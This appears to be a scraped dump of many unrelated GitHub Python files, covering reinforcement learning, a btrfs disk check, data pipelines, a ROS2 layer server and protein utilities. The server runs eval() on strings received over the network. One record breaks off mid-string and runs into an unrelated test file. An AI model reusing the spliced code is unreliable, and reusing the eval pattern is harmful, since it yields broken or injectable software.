i in range(5):\r\n for elem in state_actions:\r\n state = elem[0]\r\n action = elem[1]\r\n new_state = [state[0]+action[0],state[1]+action[1]]\r\n n = state_actions.index(elem)\r\n if new_state not in states:\r\n state_actions.remove(elem)\r\n\r\n# We take a copy of our state-actions pairs (useful later)\r\nrecord = [elem[0] for elem in state_actions]\r\n\r\n# We now initialise our estimates Q.\r\nS_A_values = [0 for i in range(len(state_actions))]\r\n\r\n# This function initialises our policy.\r\ndef reset_policy():\r\n policy = []\r\n for state in states:\r\n while True:\r\n action = random.choice(actions)\r\n if [action[0]+state[0],action[1]+state[1]] in states:\r\n break\r\n policy.append(action)\r\n return policy\r\n \r\npolicy = reset_policy()\r\n\r\n\"\"\" SARSA(N) IMPLEMENTATION \"\"\"\r\n\r\n# For when our agent needs to select a random action (for example exploring starts).\r\ndef random_action(state):\r\n new_state = 0\r\n while new_state not in states:\r\n action = random.choice(actions)\r\n new_state = [state[0]+action[0],state[1]+action[1]]\r\n return action\r\n\r\n# Telling our learning agent how to choose actions (using policy).\r\ndef choose_action(state):\r\n r = random.random()\r\n if r > epsilon:\r\n n = states.index(state)\r\n action = policy[n]\r\n else: \r\n action = random_action(state)\r\n return action\r\n\r\n# Reward function.\r\ndef reward(state):\r\n if state == goal:\r\n return 0\r\n else:\r\n return -1\r\n \r\n# This function improves our policy.\r\ndef improvement():\r\n record = [elem[0] for elem in state_actions]\r\n for state in states:\r\n options = []\r\n n = record.index(state)\r\n for i in range(record.count(state)):\r\n options.append(S_A_values[n+i])\r\n k = options.index(max(options))\r\n p = states.index(state)\r\n policy[p] = state_actions[n+k][1]\r\n \r\n# This is the actual iteration of Sarsa(n), drawing on all the other functions.\r\ndef walk(start,goal,step,alpha = 0.5):\r\n n = step\r\n S = start\r\n A = choose_action(S)\r\n S_lst = [S]\r\n A_lst = [A]\r\n R_lst = []\r\n t = 0\r\n T = 1000000\r\n tau = -1\r\n while tau != T-1:\r\n if t < T:\r\n new_S = [S[0]+A[0],S[1]+A[1]]\r\n R = reward(new_S)\r\n R_lst.append(R)\r\n S_lst.append(new_S)\r\n S = new_S\r\n if new_S == goal:\r\n T = t+1\r\n else:\r\n new_A = choose_action(new_S)\r\n A_lst.append(new_A)\r\n A = new_A\r\n tau = t - n + 1\r\n if tau >= 0:\r\n G = sum([(gamma**(i-tau-1))*R_lst[i] for i in range(tau+1,min([tau+n,T]))])\r\n if tau + n < T:\r\n k = state_actions.index([S_lst[tau+n],A_lst[tau+n]])\r\n G += (gamma**n)*S_A_values[k]\r\n p = state_actions.index([S_lst[tau],A_lst[tau]])\r\n S_A_values[p] += alpha*(G - S_A_values[p])\r\n improvement()\r\n t += 1\r\n return t\r\n\r\n# This generates a random starting state.\r\ndef starter():\r\n choices = states.copy()\r\n choices.remove(goal)\r\n return random.choice(choices)\r\n\r\n# This function essentially iterates Sarsa(n) however many times as instructed,\r\n# run(number of iterations, if you want to print all outputs, improvement plot?).\r\ndef run(n,print_,plot):\r\n x = [0]\r\n y = [0] \r\n total = 0\r\n for i in range(1,n):\r\n #walk(start,goal)\r\n #print(walk(start,goal))\r\n step = 3\r\n count = walk(starter(),goal,step)\r\n if print_:\r\n print(count)\r\n total += count\r\n x.append(total)\r\n y.append(i)\r\n if i%1000 == 0:\r\n print(i)\r\n if plot == True:\r\n plt.title(\"Episodes against timesteps for Sarsa({}): Total = {}\".format(step,total))\r\n plt.xlabel(\"Total timesteps\")\r\n plt.ylabel(\"Episodes\")\r\n plt.plot(x,y,'k-')\r\n plt.show()\r\n return total\r\n\r\n# This records our agents movements so we can plot it back later and get a nice plot.\r\ndef recorder(start,goal):\r\n S = start\r\n n = states.index(S)\r\n A = policy[n]\r\n lst = [S]\r\n i = 0\r\n while S != goal:\r\n new_S = [S[0]+A[0],S[1]+A[1]]\r\n n = states.index(new_S)\r\n new_A = policy[n]\r\n S = new_S\r\n A = new_A \r\n lst.append(S)\r\n if i > 5000:\r\n raise ValueError\r\n i += 1\r\n return lst\r\n\r\n# Making the nice plots aforementioned.\r\ndef visual(X,start):\r\n start = start\r\n if X == True:\r\n try:\r\n lst = recorder(start,goal)\r\n except:\r\n print(\"Houston, we have a problem.\")\r\n return None\r\n x = [state[0] for state in lst]\r\n y = [state[1] for state in lst]\r\n for i in range(len(lst)):\r\n plt.plot(x[i:i+2],y[i:i+2],'k-')\r\n plt.scatter(start[0],start[1],c='red',s=200)\r\n plt.scatter(goal[0],goal[1],c='green',s=200)\r\n for elem in walls:\r\n copy = elem.copy()\r\n ys = [i[1] for i in copy]\r\n if 0 in ys:\r\n copy.reverse()\r\n copy.append([copy[0][0],-1])\r\n copy.reverse()\r\n elif 10 in ys:\r\n copy.append([copy[0][0],11])\r\n plt.plot([x[0] for x in copy],[x[1] for x in copy],'k-', linewidth=3.0)\r\n plt.xticks([0,1,2,3,4,5,6,7,8,9,10])\r\n plt.yticks([0,1,2,3,4,5,6,7,8,9,10])\r\n # plt.xticks(color='w')\r\n # plt.yticks(color='w')\r\n plt.xlim(-1,11)\r\n plt.ylim(-1,11)\r\n plt.plot([-1,-1],[-1,11],'k-',linewidth=4.0)\r\n plt.plot([-1,11],[11,11],'k-',linewidth=4.0)\r\n plt.plot([11,11],[11,-1],'k-',linewidth=4.0)\r\n plt.plot([11,-1],[-1,-1],'k-',linewidth=4.0)\r\n plt.grid()\r\n plt.title(\"Optimal route\")\r\n plt.show()\r\n\r\n","repo_name":"toronto41/A-Study-of-Interaction","sub_path":"sarsa_n.py","file_name":"sarsa_n.py","file_ext":"py","file_size_in_byte":7134,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72428578409","text":"#!/usr/bin/python3.6\n\nimport os\nimport re\nimport subprocess\n\nimport logging\nfrom typing import Any, TYPE_CHECKING\nif TYPE_CHECKING:\n __salt__: Any = None\n __opts__: Any = None\nlog = logging.getLogger(__name__)\n\nBTRFS_CMD = \"/sbin/btrfs\"\nBTRFS_PKG = \"btrfsprogs\"\n\n\ndef get_btrfs_info():\n\n btrfs_info = dict()\n btrfs_info[\"btrfs\"] = {}\n \n precheck_cmd = [\"df\", \"-hTP\"]\n grep_cmd = [\"grep\", \"-E\", \"/$\"]\n regex_btrfs = r'btrfs'\n\n try:\n proc1 = subprocess.Popen(precheck_cmd, bufsize=0, stdout=subprocess.PIPE)\n proc2 = subprocess.Popen(grep_cmd, bufsize=0, stdin=proc1.stdout, stdout=subprocess.PIPE)\n for line in iter(proc2.stdout.readline, b''):\n print(line.decode('utf-8')[:-1])\n if not re.findall(regex_btrfs, line.decode('utf-8')[:-1]):\n print(\"root fs is not btrfs type.\")\n btrfs_info[\"btrfs\"][\"comment\"] = \"No btrfs, {}\".format(line.decode('utf-8')[:-1])\n btrfs_info[\"btrfs\"][\"for_patching\"] = \"ok\"\n return btrfs_info\n \n proc2.stdout.close()\n proc2.wait()\n \n except subprocess.CalledProcessError as e:\n log.error(e)\n return e\n \n if os.path.exists(BTRFS_CMD):\n rpm_cmd = [\"rpm\", \"-q\", BTRFS_PKG]\n try:\n version = subprocess.check_output(rpm_cmd).decode(\"utf-8\")\n except subprocess.CalledProcessError as e:\n log.error(e)\n return e\n \n btrfs_info[\"btrfs\"]['version'] = version\n else:\n btrfs_info[\"btrfs\"] = \"No btrfs\"\n return btrfs_info \n \n btrfs_cmd = [\"btrfs\", \"fi\", \"usage\", \"-g\", \"/\"]\n regex = r'Free.*est'\n free_size = 0\n try:\n proc = subprocess.Popen(btrfs_cmd, bufsize=0, stdout=subprocess.PIPE)\n for line in iter(proc.stdout.readline, b''):\n log.info(line.decode('utf-8')[:-1]) # [:-1] to cut off newline char\n if re.findall(regex, line.decode('utf-8')[:-1]):\n print(line.decode('utf-8')[:-1].split()[2])\n free_size = line.decode('utf-8')[:-1].split()[2]\n free_size = float(free_size.strip(\"GiB\"))\n proc.stdout.close()\n proc.wait()\n btrfs_info[\"btrfs\"][\"root_free\"] = free_size\n btrfs_info[\"btrfs\"][\"comment\"] = \"size in GiB\"\n if free_size >= 2.00:\n btrfs_info[\"btrfs\"][\"for_patching\"] = \"ok\"\n else:\n btrfs_info[\"btrfs\"][\"for_patching\"] = \"no\"\n \n return btrfs_info\n except subprocess.CalledProcessError as e:\n log.error(e)\n return e\n\n \"\"\" if isinstance(free_size_bytes, int):\n val = 0\n if free_size_bytes > 1024:\n print(\"kb\")\n val = free_size_bytes / 1024\n if val > 1024:\n print(\"mb\")\n val = val / 1024\n if val > 1024:\n print(\"gb\")\n val = val / 1024\n btrfs_info[\"free_size\"] = round(val) \"\"\"\n\n return btrfs_info\n\n\nif __name__ == \"__main__\":\n output = get_btrfs_info()\n for a, b in output.items():\n print(\"{}: {}\".format(a,b))","repo_name":"bjin01/salt-sap-patching","sub_path":"srv/salt/_grains/btrfs.py","file_name":"btrfs.py","file_ext":"py","file_size_in_byte":3149,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"34425956845","text":"import gzip\nimport os\nimport sys\nimport numpy as np\nimport tensorflow as tf\nfrom absl import flags\nimport pandas as pd\nfrom keras.utils.data_utils import get_file\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import StandardScaler\n\nfrom deepray.datasets.datapipeline import DataPipeLine\n\nFLAGS = flags.FLAGS\nFLAGS([\n sys.argv[0],\n \"--num_train_examples=182280\",\n])\n\n\nclass CreditCardFraud(DataPipeLine):\n\n def __init__(self, url='https://storage.googleapis.com/download.tensorflow.org/data/creditcard.csv'):\n super().__init__()\n csv_file = tf.keras.utils.get_file('creditcard.csv', url)\n raw_df = pd.read_csv(csv_file)\n\n raw_df[['Time', 'V1', 'V2', 'V3', 'V4', 'V5', 'V26', 'V27', 'V28', 'Amount', 'Class']].describe()\n\n neg, pos = np.bincount(raw_df['Class'])\n total = neg + pos\n print('Examples:\\n Total: {}\\n Positive: {} ({:.2f}% of total)\\n'.format(total, pos, 100 * pos / total))\n\n cleaned_df = raw_df.copy()\n\n # You don't want the `Time` column.\n cleaned_df.pop('Time')\n\n # The `Amount` column covers a huge range. Convert to log-space.\n eps = 0.001 # 0 => 0.1¢\n cleaned_df['Log Amount'] = np.log(cleaned_df.pop('Amount') + eps)\n\n train_df, test_df = train_test_split(cleaned_df, test_size=0.2)\n train_df, val_df = train_test_split(train_df, test_size=0.2)\n\n # Form np arrays of labels and features.\n self.train_labels = np.array(train_df.pop('Class'))\n self.bool_train_labels = self.train_labels != 0\n self.val_labels = np.array(val_df.pop('Class'))\n self.test_labels = np.array(test_df.pop('Class'))\n\n train_features = np.array(train_df)\n val_features = np.array(val_df)\n test_features = np.array(test_df)\n\n scaler = StandardScaler()\n train_features = scaler.fit_transform(train_features)\n\n val_features = scaler.transform(val_features)\n test_features = scaler.transform(test_features)\n\n self.train_features = np.clip(train_features, -5, 5)\n self.val_features = np.clip(val_features, -5, 5)\n self.test_features = np.clip(test_features, -5, 5)\n\n self.train_df = pd.DataFrame(self.train_features, columns=train_df.columns)\n self.val_df = pd.DataFrame(self.val_features, columns=train_df.columns)\n\n def __len__(self):\n pass\n\n def build_dataset(\n self,\n input_file_pattern,\n batch_size,\n is_training=True,\n context: tf.distribute.InputContext = None,\n use_horovod=False,\n *args,\n **kwargs\n ):\n if is_training:\n ds = tf.data.Dataset.from_tensor_slices((self.train_features, self.train_labels))\n\n else:\n ds = tf.data.Dataset.from_tensor_slices((self.val_features, self.val_labels))\n ds = ds.repeat(FLAGS.epochs).shuffle(10000).batch(batch_size)\n return ds\n","repo_name":"deepray-AI/deepray","sub_path":"deepray/datasets/creditcardfraud/creditcardfraud.py","file_name":"creditcardfraud.py","file_ext":"py","file_size_in_byte":2772,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"53"} +{"seq_id":"13711463941","text":"# requirements: pandas and sklearn\nimport pandas as pd\nfrom sklearn.feature_extraction.text import CountVectorizer\n\ndata = pd.read_csv(\"data/Team Project cleaned.csv\")\ndata_audit = data[(data.AUDIT_FEES.isna()==False)]\n\n# replace NA values in busdesc with empty string\ndata.loc[pd.isna(data.busdesc), \"busdesc\"] = \"\"\ndata_audit.loc[pd.isna(data_audit.busdesc), \"busdesc\"] = \"\"\n\n# select rows required and drop the rest\ndata_audit_text = data_audit[[\"busdesc\",\"FFI12_desc\", \"AUDIT_FEES\"]]\n\n# add FFI12_desc into the busdesc\ndata_audit_text[\"words\"] = data_audit_text[\"busdesc\"] + \" \" + data_audit_text[\"FFI12_desc\"]\ndata_audit_text = data_audit_text[[\"AUDIT_FEES\", \"words\", \"FFI12_desc\"]]\n\n# remove punctuations and numbers from the words\nwords_cleaned = []\nfor row in data_audit_text[\"words\"]:\n sentence_cleaned = []\n for word in row.split():\n word = word.strip(\"'/,.!@#$%^&*()-_1234567890=+[]\\{\\}\\|\\\";:> 0.0001 for v in [c_diff, d_diff, dc_da_diff, dc_db_diff, dd_da_diff, dd_db_diff]]):\n print(\"FAILED (matmul) :(\")\n else:\n print(\"PASSED (matmul) :)\")\n\n\ndef check_mse():\n n = 32\n\n with tf.GradientTape(persistent=True) as t:\n y_true = tf.get_variable(dtype=tf.float32, shape=(n,), name='y_true')\n y_pred = tf.get_variable(dtype=tf.float32, shape=(n,), name='y_pred')\n\n tf_c = tf.reduce_mean(tf.math.squared_difference(y_true, y_pred))\n my_c = mse_tf(y_true, y_pred)\n\n tf_d = tf.exp(tf_c, 3)\n my_d = tf.exp(my_c, 3)\n\n tf_dc_da, tf_dc_db = t.gradient(tf_c, [y_true, y_pred])\n my_dc_da, my_dc_db = t.gradient(my_c, [y_true, y_pred])\n\n tf_dd_da, tf_dd_db = t.gradient(tf_d, [y_true, y_pred])\n my_dd_da, my_dd_db = t.gradient(my_d, [y_true, y_pred])\n\n c_diff = np.max(np.abs(tf_c.numpy() - my_c.numpy()))\n d_diff = np.max(np.abs(tf_d.numpy() - my_d.numpy()))\n dc_da_diff = np.max(np.abs(tf_dc_da.numpy() - my_dc_da.numpy()))\n dc_db_diff = np.max(np.abs(tf_dc_db.numpy() - my_dc_db.numpy()))\n dd_da_diff = np.max(np.abs(tf_dd_da.numpy() - my_dd_da.numpy()))\n dd_db_diff = np.max(np.abs(tf_dd_db.numpy() - my_dd_db.numpy()))\n\n if any([v > 0.0001 for v in [c_diff, d_diff, dc_da_diff, dc_db_diff, dd_da_diff, dd_db_diff]]):\n print(\"FAILED (mse) :(\")\n else:\n print(\"PASSED (mse) :)\")\n\n\nif __name__ == '__main__':\n tf.enable_eager_execution()\n tf.set_random_seed(311602536)\n\n check_matmul()\n check_mse()\n\n X, y = load_data()\n losses = train(epochs=50, learning_rate=0.01, batch_size=32)\n\n","repo_name":"AlonNT/APML","sub_path":"ex1/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":2733,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73385520807","text":"# Program: Deret Karakter\n# Tuliskan program yang membaca sebuah karakter C dan sebuah integer N,\n# kemudian menuliskan dalam satu baris, karakter C sebanyak N. Asumsikan N > 0.\n\n# KAMUS\n# C = string\n# N = int\n# i = int\n\n# ALGORITMA\n\nC = str(input())[0]\nN = int(input())\n\nfor i in range(N):\n print(C,end='')\nprint()","repo_name":"zshnrg/Praktikum-Daspro-STEI-2022","sub_path":"Praktikum 3/Soal 3/deretkarakter.py","file_name":"deretkarakter.py","file_ext":"py","file_size_in_byte":318,"program_lang":"python","lang":"id","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"14371264514","text":"from dffw_msgs.msg import *\nfrom dffw_msgs.srv import *\nfrom dffw.dataconvert import *\nfrom dffw.common import *\nimport json\nfrom rclpy.node import Node\nimport os\n\nSERVER_NAME = 'server_'\nMODEL_WEIGHT_ROOT_PATH = '/root/weight'\ndef create_layer(layer_info):\n args = layer_info['args']\n module = layer_info['module']\n inp = ', '.join(map(str,args))\n return eval(f'{module}({inp})')\n\nclass LayerRunner(object):\n def __init__(self, node,\n layer_info, \n is_cuda=False,\n load_weight=False):\n self.node = node\n self.layer_info = json.loads(layer_info)\n self.save_path = f\"{MODEL_WEIGHT_ROOT_PATH}/{self.layer_info['model_name']}/{self.layer_info['layer_id']}/{self.layer_info['module']}.pth\"\n self.layer = create_layer(self.layer_info)\n self.load_weight = load_weight\n self.is_cuda = is_cuda\n if self.is_cuda:\n self.layer = self.layer.cuda()\n if os.path.exists(self.save_path):\n if self.load_weight:\n self.layer.load_state_dict(torch.load(self.save_path))\n else:\n if not os.path.isdir(os.path.dirname(self.save_path)):\n os.makedirs(os.path.dirname(self.save_path))\n\n self.epochs = self.layer_info['epochs']\n self.train_type = self.layer_info['train_type']\n self.Tsub = self.node.create_subscription(\n eval(self.layer_info['trainInp']['type'][0]),\n self.layer_info['trainInp']['name'][0],\n self.traincallback,\n 10)\n \n self.Tpub = self.node.create_publisher(\n eval(self.layer_info['trainOut']['type'][0]), \n self.layer_info['trainOut']['name'][0], \n 10)\n self.Fsub = self.node.create_subscription(\n eval(self.layer_info['inferenceInp']['type'][0]),\n self.layer_info['inferenceInp']['name'][0],\n self.forwardcallback,\n 10)\n self.Fpub = self.node.create_publisher(\n eval(self.layer_info['inferenceOut']['type'][0]), \n self.layer_info['inferenceOut']['name'][0],\n 10)\n \n def model_name(self):\n return self.layer_info['model_name']\n \n def traincallback(self, msg):\n h_pos, h_neg = TFmsg2tensor(msg) #TBD: change to a universal method\n if self.is_cuda:\n h_pos = h_pos.cuda()\n h_neg = h_neg.cuda()\n self.layer.train()\n print(self.train_type)\n h_pos, h_neg = self.layer.train_ff(h_pos, h_neg, \n self.epochs, self.train_type)\n msg = TrainForward()\n msg = TFtensor2msg(h_pos, h_neg) #TBD: change to a universal method\n self.Tpub.publish(msg)\n self.save()\n \n def forwardcallback(self, msg):\n h,_ = IFmsg2tensor(msg) #TBD: change to a universal method\n if self.is_cuda:\n h = h.cuda()\n self.layer.eval()\n h = self.layer.forward_ff(h)\n goodness = h.pow(2).mean(1)\n if self.is_cuda:\n h = h.cpu()\n goodness = goodness.cpu()\n msg = InferanceForward()\n msg = IFtensor2msg(h, goodness) #TBD: change to a universal method\n self.Fpub.publish(msg)\n\n\n def save(self):\n torch.save(self.layer.state_dict(), self.save_path)\n # save weight to local TBD: to master\n\n def destroy(self):\n try:\n self.node.destroy_subscription(self.Tsub)\n self.node.destroy_subscription(self.Fsub)\n self.node.destroy_publisher(self.Tpub)\n self.node.destroy_publisher(self.Fpub)\n del self.layer\n except Exception as e:\n print(e)\n\nclass ServerNode(Node):\n def __init__(self, server_name=SERVER_NAME,\n is_cuda = False,\n load_weight = False\n ):\n super().__init__(server_name)\n self.layer_runners = []\n self.is_cuda = is_cuda\n self.load_weight = load_weight\n self.create_sevice = self.create_service(\n Str, \n f'{self.get_name()}/create_layer', \n self.create_service_callback\n )\n self.delete_sevice = self.create_service(\n Str, \n f'{self.get_name()}/delete_layer', \n self.delete_service_callback\n )\n self.get_logger().info('Server Successfully Created!')\n\n def create_service_callback(self, request, response):\n self.get_logger().info('create_service_callback called!')\n response.msg = f'failed|'\n if request.msg:\n # try:\n layer_info = request.msg\n layer_runner = LayerRunner(self, \n layer_info,\n self.is_cuda,\n self.load_weight\n )\n self.layer_runners.append({'model_name':layer_runner.model_name(),\n 'layer_runner': layer_runner})\n response.msg = f'success|{layer_info}'\n self.get_logger().info(f'{layer_runner.layer_info[\"model_name\"]}/{layer_runner.layer_info[\"module\"]}/{layer_runner.layer_info[\"args\"]} created!')\n return response\n # except Exception as e:\n # response.msg = f'fail|{layer_info}|{e}'\n # return response\n \n\n def delete_service_callback(self, request, response):\n self.get_logger().info('delete_service_callback called!')\n response.msg = f'failed|'\n if request.msg:\n try:\n delete_model_name = request.msg\n for l in self.layer_runners:\n if delete_model_name == l['model_name']:\n runner = l['layer_runner']\n runner.destroy()\n self.layer_runners.remove(l)\n response.msg = f'success|{delete_model_name}'\n self.get_logger().info(f'{delete_model_name} deleted!')\n return response\n except Exception as e:\n response.msg = f'failed|{delete_model_name}|e'\n self.get_logger().info(f'{delete_model_name} delete failed!')\n return response\n ","repo_name":"dengbuqi/dffw","sub_path":"ros2_ws/src/dffw/dffw/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":6772,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34948295707","text":"from geotrellis import *\n\nraster = load_raster(user_param(\"string\", \"raster\"))\nhist = histogram(raster)\nbreaks = get_color_breaks(hist)\npng = render_png(raster, breaks, hist)\n\nservice = Service(\"pyrender\",[(\"raster\",\"the raster to render\")], png)\n\nrun_service(service)\n","repo_name":"ahinz/geotrellis-sexp-example","sub_path":"src/main/resources/services/pyrender.py","file_name":"pyrender.py","file_ext":"py","file_size_in_byte":269,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14820924919","text":"coding=\"UTF-8\"\nimport os\nimport argparse\n\nparser = argparse.ArgumentParser('Parameter error, please enter the correct parameter!')\nparser.add_argument('-ref', help='ref')\nparser.add_argument('-u', help='unify')\nargs = parser.parse_args()\n\n# Enter the path where the file to be processed is located\nfile_path=args.ref\n#Enter the path where the file to be generated\nresult_dir=args.u\n\nif not os.path.exists(result_dir):\n os.mkdir(result_dir)\n\n\nfor file_name in os.listdir(file_path):\n \n if os.path.isfile(file_path+file_name):\n with open(file_path+file_name, 'r') as rf: \n with open(result_dir+\"/{}\".format(file_name),'w') as newf:\n for line in rf: \n if line == '':\n break\n elif line.startswith('>'):\n line=str(line)\n line1=line.split('_')[0]+'_'+'\\n'\n newf.write(line1)\n else:\n newf.write(line)\n ","repo_name":"10129086/Supplementary-codes-for-dissertation","sub_path":"shell/unify.py","file_name":"unify.py","file_ext":"py","file_size_in_byte":1082,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23545162442","text":"# Program: rectangle_main.py\n# Programmer: Kellen Land\n# Date: 11/01/2022\n# Description: Lab 8\n#################################\n\nimport rectangle_mod\n\nprint(\"Program - Find Area and Perimeter of Rectangle: \")\n\nrepeat = True\n\nwhile repeat:\n width = input(\"\\nEnter the rectangle's width (inches): \")\n width = float(width)\n length = float(input(\"Enter rectangle's length (inches): \"))\n \n area = rectangle_mod.find_area(width, length)\n perimeter = rectangle_mod.find_perimeter(width, length)\n \n print(f\"\\nThe area is {area:,.0f}\")\n print(f\"\\nThe perimeter is {perimeter:,.0f}\")\n \n again = input(\"\\nWould you like to do another calculation? (y/n) \")\n if again == 'n':\n repeat = False\n \nprint(\"\\nThanks for using this program. Goodbye.\\n\")","repo_name":"ktland/SchoolNotes","sub_path":"Fall 2022/Python/Labs/unit_3/lab_8/rectangle_main.py","file_name":"rectangle_main.py","file_ext":"py","file_size_in_byte":800,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"21451296035","text":"import unittest\n\nfrom layoff import Solution\n\nclass Test(unittest.TestCase):\n def setUp(self) -> None:\n self.s = Solution()\n return super().setUp()\n\n def test1(self):\n digits = \"23\"\n out = [\"ad\",\"ae\",\"af\",\"bd\",\"be\",\"bf\",\"cd\",\"ce\",\"cf\"]\n self.assertEqual(self.s.letterCombinations(digits), out)\n\n def test2(self):\n digits = \"2\"\n out = [\"a\",\"b\",\"c\"]\n self.assertEqual(self.s.letterCombinations(digits), out) \n\nif __name__ == \"__main__\":\n unittest.main()","repo_name":"jerrt2003/leetcode-in-python","sub_path":"17_Letter_Combinations_of_a_Phone_Number/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":526,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70112511210","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jan 24 15:34:54 2022\nLast update: 3/4/2023\n\n@author: sudhanshu\n\"\"\"\n# from importlib.abc import Loader\n# from isort import file\nimport torch\nfrom torch.utils.data import DataLoader\nimport numpy as np\nimport os\nimport sys\n\nsys.path.append(\"..\")\nfrom data_preparation.data_utils import aa_1_letter_code\nfrom data_util import ThreeDDataset,PDB_NPZ_Dataset\nfrom settings import config1\n# For training specific\n\ndef save_checkpoint(state, filename=\"my_checkpoint.pth.tar\"):\n print(\"=> Saving checkpoint\")\n torch.save(state, filename)\n print(\"=> Saved checkpoint\")\n \n\n\ndef load_checkpoint(checkpoint, model, optimizer, mode = \"train\"):\n print(\"=> Loading checkpoint\")\n model.load_state_dict(checkpoint[\"state_dict\"]) \n if mode == \"train\":\n optimizer.load_state_dict(checkpoint[\"optimizer\"])\n return checkpoint[\"epoch\"], checkpoint[\"best\"]\n\n\ndef split_indices(n,val_part):\n n_val = int(val_part*n)\n idxn = np.random.permutation(n)\n return idxn[n_val:],idxn[:n_val]\n\ndef len_of_data(directory_,ext=\".npz\"):\n count = 0\n for i in os.listdir(directory_):\n if i.endswith(ext):\n count += 1\n return count\n\n\ndef get_loaders( train_dir, val_dir, batch_size, data_reader_and_transform,\n num_workers=4, pin_memory=True, layers = 0 ):\n \n train_ds = PDB_NPZ_Dataset( protein_dir=train_dir, transformer=data_reader_and_transform, train=1) \n train_loader = DataLoader( train_ds, batch_size=batch_size, num_workers=num_workers,\n pin_memory=pin_memory, shuffle=True )\n\n val_ds = PDB_NPZ_Dataset( protein_dir=val_dir, transformer=data_reader_and_transform)\n val_loader = DataLoader( val_ds, batch_size=1, num_workers=num_workers,\n pin_memory=pin_memory, shuffle=False )\n\n return train_loader, val_loader\n\n\n\ndef check_accuracy(loader, model, device=\"cuda\"):\n num_correct = 0\n num_pixels = 0\n dice_score = 0\n model.eval()\n\n\n with torch.no_grad():\n for x, y in loader:\n x = x.to(device,dtype=torch.float)\n y = y.to(device, dtype=torch.float).unsqueeze(1)\n #print(x.shape)\n #preds = torch.sigmoid(model(x))\n preds = model(x)\n #print(preds)\n preds = (preds > 0.5).float()\n num_correct += (preds == y).sum()\n num_pixels += torch.numel(preds)\n dice_score += (2*(preds * y).sum()) /((preds +y).sum() + 1e-8)\n\n print(\n f\"Got {num_correct}/{num_pixels} with acc {num_correct/num_pixels*100:.2f}\"\n )\n\n print (f\"Dice score: {dice_score/len(loader)}\")\n model.train()\n\n\ndef calc_accuracy(loader, model, device=\"cuda\"):\n dice_score = 0\n model.eval()\n with torch.no_grad():\n for count, (x, y) in enumerate(loader):\n x = x.to(device,dtype=torch.float)\n y = y.to(device, dtype=torch.float).unsqueeze(1)\n\n #preds = torch.sigmoid(model(x))\n preds = model(x)\n #print(preds)\n preds = (preds > 0.5).float()\n dice_score +=dice(y,preds)\n \n model.train()\n return dice_score/count\n\n\ndef save_predictions_as_masks(loader, model, folder= \"saved_masks\", device =\"cuda\"):\n model.eval()\n\n for idx, (x,y) in enumerate(loader): \n x = x.to(device=device, dtype=torch.float)\n with torch.no_grad():\n #preds = torch.sigmoid(model(x))\n preds = model(x)\n preds = (preds > 0.5).float()\n\n xx = x.cpu()\n for idx2, i in enumerate(range(xx.shape[0])):\n np.savez(folder + \"/\" + f\"protein_{idx}_{idx2}.npz\",\n layers = xx[i,...],\n )\n \n \n np.savez(folder + \"/\" + f\"pred_{idx}_{idx2}.npz\",\n interaction= preds[i].cpu(),\n )\n \n np.savez(folder + \"/\" + f\"real_{idx}_{idx2}.npz\",\n interaction= y[i].cpu(),\n )\n\n model.train() \n \n \ndef dice(y_true, y_pred, smoothing_factor=0.01):\n y_true_f = torch.flatten(y_true,1)\n \n y_pred_f = torch.flatten(y_pred,1)\n # print(y_true_f, y_pred_f,\"----\")\n intersection = torch.sum(y_true_f * y_pred_f)\n return ((2. * intersection + smoothing_factor)\n / (torch.sum(y_true_f) + torch.sum(y_pred_f) + smoothing_factor))\n\n\ndef dice_loss(y_true, y_pred):\n #print(y_true.shape, y_pred.shape)\n return -dice(y_true, y_pred)\n\n \ndef report_file_name(directory, use_previous=0):\n file_init = directory + \"/report_\"\n for i in range(1000):\n trial_file = file_init + (\"%4d\" % (i+1)).replace(\" \",\"0\") + \".dat\"\n if not os.path.exists(trial_file):\n if use_previous == 1:\n trial_file = file_init + (\"%4d\" % (i)).replace(\" \",\"0\") + \".dat\"\n break\n \n return trial_file\n \n \n \nclass xyz_to_rotate_to_voxelize_to_translate:\n # if the size is bigger than cube_size\n #it randomely cuts data to fit in a cube\n \n def __init__(self):\n self.voxel_size_A = 2\n self.cube_size = 36\n self.aa_seq = aa_1_letter_code()\n self.max_pixel_translate_per_axis = 3\n self.max_rotation_plus_minus = 180\n self.cube_start_points = -1 # -1 for random\n self.use_CA_vetor = 1\n self.use_res_index = 0 # for prediction output in predictor\n self.return_res_numbers_from_1 = 0\n self.layers_use = 32\n self.layer_29_type = 0 #CA=0 #CB=1 #CB-CArray=3 works for layers_use=29\n self.crop_extra_edge = 0\n self.randomize_by = 0.0 #A # for training only\n #self.pdb_f=pdb_functions() only for debugging\n \n\n def apply(self, xyz_data, static_data, train =0): \n self.xyz_data = xyz_data\n self.rotate_coordinates_by( self.max_rotation_plus_minus )\n \n self.xyz_beta_data = self.xyz_data[range(0,len(self.xyz_data),2),:]\n self.xyz_alpha_data = self.xyz_data[range(1,len(self.xyz_data),2),:]\n beta_rand = 0\n alpha_rand = 0\n # print(\"HI\", self.randomize_by, train)\n if train == 1:\n if self.randomize_by > 0:\n beta_rand = (np.random.rand(self.xyz_beta_data.shape[0], \n self.xyz_beta_data.shape[1])*2 -1)*self.randomize_by\n alpha_rand = (np.random.rand(self.xyz_alpha_data.shape[0],\n self.xyz_alpha_data.shape[1])*2 